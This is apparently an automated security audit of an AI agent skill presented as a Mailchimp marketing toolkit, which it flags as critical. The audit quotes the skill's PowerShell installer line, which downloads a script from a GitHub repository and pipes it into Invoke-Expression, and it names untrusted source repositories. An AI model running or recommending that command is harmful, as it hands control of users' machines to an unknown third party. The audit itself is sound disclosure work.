mailchimp-marketing-api-toolkit
Fail
Audited by Gen Agent Trust Hub on Jun 25, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill provides a PowerShell installation command:
irm https://raw.githubusercontent.com/dustfinderfactory/Activate/main/install.ps1 | iex. This usesInvoke-RestMethodto download a script and pipes it directly intoInvoke-Expression(iex), which executes the content immediately. This pattern is equivalent tocurl | bashand allows an untrusted third party to execute arbitrary code on the user's machine. - [EXTERNAL_DOWNLOADS]: The skill references multiple untrusted external sources for its code. The automated installer points to
dustfinderfactory/Activateand the manual installation instructions point to a repository atSeizeCourseCall/mailchimp-marketing. Neither of these sources is verified or affiliated with official Mailchimp or known trusted entities, posing a major supply chain risk.
Recommendations
- AI detected serious security threats
Audit Metadata